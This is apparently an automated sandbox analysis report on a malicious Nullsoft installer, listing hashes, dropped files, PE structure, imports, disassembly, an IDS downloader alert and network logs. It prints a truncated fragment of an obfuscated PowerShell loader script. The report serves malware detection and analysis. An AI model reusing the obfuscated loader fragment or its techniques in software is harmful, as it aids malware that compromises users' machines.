                                                                                  SSDEEP:12288:IfL/UfibuhAHWK1pKC4eCnFpS57Maa0sNa9GtKlQyYefZKSxA340ryKhz:IfL8fibuqH31OFEpMgsNOGtjexKj3v
                                                                                  MD5:03ABC55B8081DADF39D55EBD481BEF1C
                                                                                  SHA1:9B7DA36F4FED678308ED8F88BB0AE9797969F8F5
                                                                                  SHA-256:D7E1F00DDF7E5B61046566992A771FF1AE5B99AC2DF6C906B7CDE3D24C611875
                                                                                  SHA-512:2360E6635D1F44CF90BDF9FFECD6F3E08B1EC345077A0A4830477841F34FE7430718C2A82771475DC7032C3B3E4E714D56F1F96256F0766A96206B8A1071A2A7
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  • Antivirus: Virustotal, Detection: 69%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................@...k...........................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....k...@...l..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):7168
                                                                                  Entropy (8bit):5.2959870663251625
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                                                                  MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                                                                  SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                                                                  SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                                                                  SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: 7uY105UTJU.exe, Detection: malicious
                                                                                  • Filename: iwEnYIOol8.exe, Detection: malicious
                                                                                  • Filename: 678763_PDF.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: Shipping documents 000022999878999800009999.exe, Detection: malicious
                                                                                  • Filename: Ze1Ueabtx5.img, Detection: malicious
                                                                                  • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious
                                                                                  • Filename: 4hIPvzV6a2.exe, Detection: malicious
                                                                                  • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious
                                                                                  • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (4367), with CRLF, LF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):73501
                                                                                  Entropy (8bit):5.195629813908633
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:sGkALWrIgzzBfnQonRc64iqUBim9jCvB1o2oXzlUlBUJew:srcgzzptddq21PzlUlCj
                                                                                  MD5:C03317CCDAB0DBDB1CAE33F7B8E5F604
                                                                                  SHA1:11A8B9667E5426B6663362A41AAF69AF2DCC753C
                                                                                  SHA-256:0F564121D89F2527C16C123D0A5A22112D9899B4AFDDAB264A78C2BC22F6AB9B
                                                                                  SHA-512:ED27908E9178F57614565EE62F7582BBFC9A5A55A2BF0695719B8AFB02AA288FF065915358DF95744A29E9E896335C078C2F939B95811DB1CDE91B39ACCD13F8
                                                                                  Malicious:true
                                                                                  Preview:$Pilocarpidine=$Vekselererfirma69;.....<#Mousee konspiration Boomless Pesticide Voldtgtsforbryderens #>..<#Bgespinder Kooperatr Vedhftnings #>..<#Arbejdsmarkedsforsker Benzalcyanhydrin Eroticism Bespyttede Glaspusteri #>..<#hksaksene Dasypeltis Kildeskattelov Vareglds Gullis Perigeal Hovedeffekter #>..<#Tortured Udloeber Smagsdommere #>..<#Overanstrengtes Minicourses Washbasket Emptional lavadelens Circumlunar Protagoras #>...$weightiest = @'. reactu.Arbejds$WeetlesK Uds.edaMizenssr Drugg a DrunkekStilbumtDehortaePellagrrMi.iariiFstningsForforst F,lnesi AnlaegkPreconskMetreteeEtabli rhulkortnFilmdage M,starsPi falleMorgeneg.muggeryKe nehunSpeedlydGreetere Exclusl N,nflis MalkniePlasmo,sFolesdegBeechborGauch,euStegefenSpaltekd ErogensSentimeuEcrustarAgamogen Elektro tankv.uIn ermis TonefiePatentesmot ons=Brunalg$ Sels.aGCya omeaUdsaltnd RipelywFolk,tiaZonelovlPromulgl grati sActiviz;Tilbage.SkoleplfChikansuDescendn forudacPhotoprt Gastrii Kr.setoUdpegelnCubbyho GenetabAprojek,aBrachygb
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):343595
                                                                                  Entropy (8bit):7.597948301179099
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:MtJkphixoQmYAgBxEqrv8/gvrJ/J51p+YbTxomcLeipDRPWHJR:ykphiO76Eu8/MLH6/5RPYJR
                                                                                  MD5:179686FCD721E9D3B5194D75CC32EC72
                                                                                  SHA1:338362B99ED884CAE266782E372F522E496A870C
                                                                                  SHA-256:D20D500F925CB2AB7D47520A0C83BAB26C6E546275A6209D12A0E015DC29813B
                                                                                  SHA-512:DA1C12F42737CD7EF2438661E4A6885806EB6B1DF7A0E48E720352B99606306E291D1F32AE1BC423DF38D62976FDCA7B2C4B3A723542D14FD5B5010BE1764B67
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):408232
                                                                                  Entropy (8bit):1.259531155482668
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:c3mYm00dVSgDT+afxNr3DwNJbiI7MrrtHFmYA3vCiuv/BQanrlhqkroqqL7jCzHs:X00FVwDotSeUpjvxXDpih4YZtc
                                                                                  MD5:CCE82C77E237537520FBD52B63A51E58
                                                                                  SHA1:D902CE813446431FFECA35141FCD9825D4DBEF4D
                                                                                  SHA-256:0F7DCA6879E497104B6813228391DECF7D6270D90FC887F1B9384B5E5B438221
                                                                                  SHA-512:2F0C0A6FBA09D19D72828589A658FEECD9E0A03F2B8C3DCA046AACFCB887375D538452D59DB24EDB8D17199AC3CA43ED1373262B6206B30F55F00ED159BAFEFE
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 55
                                                                                  Category:dropped
                                                                                  Size (bytes):379198
                                                                                  Entropy (8bit):1.2531245811733491
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:K2a+g7Qqek5bnEKRY3dJkKoYZrcvYy5oXBfwokPtW:TrvqLJnudnttcvARYtW
                                                                                  MD5:B4BD98AA231F431FA2C0B32C041971DA
                                                                                  SHA1:D58868B02A5DEDACC33CE7EB0658201EF5A29766
                                                                                  SHA-256:E34CA004CCB16A80E49010B584428A08AB3D89FCA778567346D26F84FF892962
                                                                                  SHA-512:69CD7AF495A1DC3F612B456A2ABB2FE9F6FF556E73DA0707B26325E08AA94138FB094DAA4A35E7C7BCDCE81FDF118A9A4C664632523CEED16765B2E74FCBDD05
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\AM983ebb5F.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):495136
                                                                                  Entropy (8bit):1.2514913232658866
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:jfLDH9Jx2uiEaWIwEfM+5EUPDohS/uF1bXyCOAqRu:TsIaV+CDTuF1bizAT
                                                                                  MD5:F28B6FB0CA8AF14D2913C43CBEA08754
                                                                                  SHA1:0BA129FCFA0131A4EFCDF2B1952F4FAE59604720
                                                                                  SHA-256:F1C35573809F92DC65D2EB2EBC3CD9D0C78E75E73ED741E52BAECAE2FC02DD70
                                                                                  SHA-512:523F6E0A8E879F13AB9D7BAE0E7A7E0157ABB0A8B1240F0EC0B5FF84C26A3F1519535DFAD9170BC6E887AE70DE03B939148D629695DB71DC53DF5A75AC2E2757
                                                                                  Malicious:false
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):7.815204873069211
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:AM983ebb5F.exe
                                                                                  File size:732'452 bytes
                                                                                  MD5:03abc55b8081dadf39d55ebd481bef1c
                                                                                  SHA1:9b7da36f4fed678308ed8f88bb0ae9797969f8f5
                                                                                  SHA256:d7e1f00ddf7e5b61046566992a771ff1ae5b99ac2df6c906b7cde3d24c611875
                                                                                  SHA512:2360e6635d1f44cf90bdf9ffecd6f3e08b1ec345077a0a4830477841f34fe7430718c2a82771475dc7032c3b3e4e714d56f1f96256f0766a96206b8a1071a2a7
                                                                                  SSDEEP:12288:IfL/UfibuhAHWK1pKC4eCnFpS57Maa0sNa9GtKlQyYefZKSxA340ryKhz:IfL8fibuqH31OFEpMgsNOGtjexKj3v
                                                                                  TLSH:B8F412D03C509491EEE57972F97B4EA107532C2A72D9371F23B4336819A3253AB5FA0B
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........
                                                                                  Icon Hash:539b8caeaee66c11
                                                                                  Entrypoint:0x403532
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                  Instruction
                                                                                  sub esp, 000003F8h
                                                                                  push ebp
                                                                                  push esi
                                                                                  push edi
                                                                                  push 00000020h
                                                                                  pop edi
                                                                                  xor ebp, ebp
                                                                                  push 00008001h
                                                                                  mov dword ptr [esp+20h], ebp
                                                                                  mov dword ptr [esp+18h], 0040A2D8h
                                                                                  mov dword ptr [esp+14h], ebp
                                                                                  call dword ptr [004080A4h]
                                                                                  mov esi, dword ptr [004080A8h]
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  push eax
                                                                                  mov dword ptr [esp+4Ch], ebp
                                                                                  mov dword ptr [esp+0000014Ch], ebp
                                                                                  mov dword ptr [esp+00000150h], ebp
                                                                                  mov dword ptr [esp+38h], 0000011Ch
                                                                                  call esi
                                                                                  test eax, eax
                                                                                  jne 00007FF88C6BA88Ah
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  mov dword ptr [esp+34h], 00000114h
                                                                                  push eax
                                                                                  call esi
                                                                                  mov ax, word ptr [esp+48h]
                                                                                  mov ecx, dword ptr [esp+62h]
                                                                                  sub ax, 00000053h
                                                                                  add ecx, FFFFFFD0h
                                                                                  neg ax
                                                                                  sbb eax, eax
                                                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                                                  not eax
                                                                                  and eax, ecx
                                                                                  mov word ptr [esp+00000148h], ax
                                                                                  cmp dword ptr [esp+38h], 0Ah
                                                                                  jnc 00007FF88C6BA858h
                                                                                  and word ptr [esp+42h], 0000h
                                                                                  mov eax, dword ptr [esp+40h]
                                                                                  movzx ecx, byte ptr [esp+3Ch]
                                                                                  mov dword ptr [004347B8h], eax
                                                                                  xor eax, eax
                                                                                  mov ah, byte ptr [esp+38h]
                                                                                  movzx eax, ax
                                                                                  or eax, ecx
                                                                                  xor ecx, ecx
                                                                                  mov ch, byte ptr [esp+00000148h]
                                                                                  movzx ecx, cx
                                                                                  shl eax, 10h
                                                                                  or eax, ecx
                                                                                  movzx ecx, byte ptr [esp+0000004Eh]
                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x54000 | 0x16bf0 | .rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                  .text | 0x1000 | 0x68d8 | 0x6a00 | 742185983fa6320c910f81782213e56f | False | 0.6695165094339622 | data | 6.478461709868021 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata | 0x8000 | 0x1464 | 0x1600 | a995b118b38426885fc6ccaa984c8b7a | False | 0.4314630681818182 | data | 4.969091535632612 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data | 0xa000 | 0x2a818 | 0x600 | 9a9bf385a30f1656fc362172b16d9268 | False | 0.5247395833333334 | data | 4.172601271908501 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .ndata | 0x35000 | 0x1f000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc | 0x54000 | 0x16bf0 | 0x16c00 | 4361f60a54e8593e396ed02385fb8e51 | False | 0.43695269574175827 | data | 5.337867037994319 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                  RT_ICON | 0x54328 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.3725452502070271
                                                                                  RT_ICON | 0x64b50 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5725103734439834
                                                                                  RT_ICON | 0x670f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.676829268292683
                                                                                  RT_ICON | 0x681a0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6172707889125799
                                                                                  RT_ICON | 0x69048 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7436823104693141
                                                                                  RT_ICON | 0x698f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.5361271676300579
                                                                                  RT_ICON | 0x69e58 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.849290780141844
                                                                                  RT_DIALOG | 0x6a2c0 | 0x100 | data | English | United States | 0.5234375
                                                                                  RT_DIALOG | 0x6a3c0 | 0x11c | data | English | United States | 0.6056338028169014
                                                                                  RT_DIALOG | 0x6a4e0 | 0xc4 | data | English | United States | 0.5918367346938775
                                                                                  RT_DIALOG | 0x6a5a8 | 0x60 | data | English | United States | 0.7291666666666666
                                                                                  RT_GROUP_ICON | 0x6a608 | 0x68 | data | English | United States | 0.7211538461538461
                                                                                  RT_VERSION | 0x6a670 | 0x240 | data | English | United States | 0.5364583333333334
                                                                                  RT_MANIFEST | 0x6a8b0 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                                                                  DLL | Import
                                                                                  ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                  SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                  ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                  COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                  USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                  GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                  KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                                                                  Language of compilation system | Country where language is spoken | Map
                                                                                  English | United States |
                                                                                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                  2025-01-11T05:29:32.250610+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49202 | 216.58.206.46 | 443 | TCP
                                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                  Jan 11, 2025 05:28:54.856409073 CET | 65412 | 53 | 192.168.2.4 | 162.159.36.2
                                                                                  Jan 11, 2025 05:28:54.861273050 CET | 53 | 65412 | 162.159.36.2 | 192.168.2.4
                                                                                  Jan 11, 2025 05:28:54.861387968 CET | 65412 | 53 | 192.168.2.4 | 162.159.36.2
                                                                                  Jan 11, 2025 05:28:54.866316080 CET | 53 | 65412 | 162.159.36.2 | 192.168.2.4
                                                                                  Jan 11, 2025 05:28:55.373934984 CET | 65412 | 53 | 192.168.2.4 | 162.159.36.2
                                                                                  Jan 11, 2025 05:28:55.379061937 CET | 53 | 65412 | 162.159.36.2 | 192.168.2.4
                                                                                  Jan 11, 2025 05:28:55.379143953 CET | 65412 | 53 | 192.168.2.4 | 162.159.36.2
                                                                                  Jan 11, 2025 05:29:31.182454109 CET | 49202 | 443 | 192.168.2.4 | 216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.182499886 CET | 443 | 49202 | 216.58.206.46 | 192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.182636976 CET | 49202 | 443 | 192.168.2.4 | 216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.207161903 CET | 49202 | 443 | 192.168.2.4 | 216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.207195044 CET | 443 | 49202 | 216.58.206.46 | 192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.853538990 CET | 443 | 49202 | 216.58.206.46 | 192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.853631020 CET | 49202 | 443 | 192.168.2.4 | 216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.855058908 CET | 443 | 49202 | 216.58.206.46 | 192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.855129004 CET | 49202 | 443 | 192.168.2.4 | 216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.938363075 CET | 49202 | 443 | 192.168.2.4 | 216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.938385010 CET | 443 | 49202 | 216.58.206.46 | 192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.938915014 CET | 443 | 49202 | 216.58.206.46 | 192.168.2.4
                                                                                  Jan 11, 2025 05:29:31.938982964 CET | 49202 | 443 | 192.168.2.4 | 216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.954710007 CET | 49202 | 443 | 192.168.2.4 | 216.58.206.46
                                                                                  Jan 11, 2025 05:29:31.995335102 CET | 443 | 49202 | 216.58.206.46 | 192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.250514984 CET | 443 | 49202 | 216.58.206.46 | 192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.250608921 CET | 443 | 49202 | 216.58.206.46 | 192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.250662088 CET | 49202 | 443 | 192.168.2.4 | 216.58.206.46
                                                                                  Jan 11, 2025 05:29:32.250858068 CET | 49202 | 443 | 192.168.2.4 | 216.58.206.46
                                                                                  Jan 11, 2025 05:29:32.260859013 CET | 49202 | 443 | 192.168.2.4 | 216.58.206.46
                                                                                  Jan 11, 2025 05:29:32.260886908 CET | 443 | 49202 | 216.58.206.46 | 192.168.2.4
                                                                                  Jan 11, 2025 05:29:32.290909052 CET49209443192.168.2.4142.250.185.129
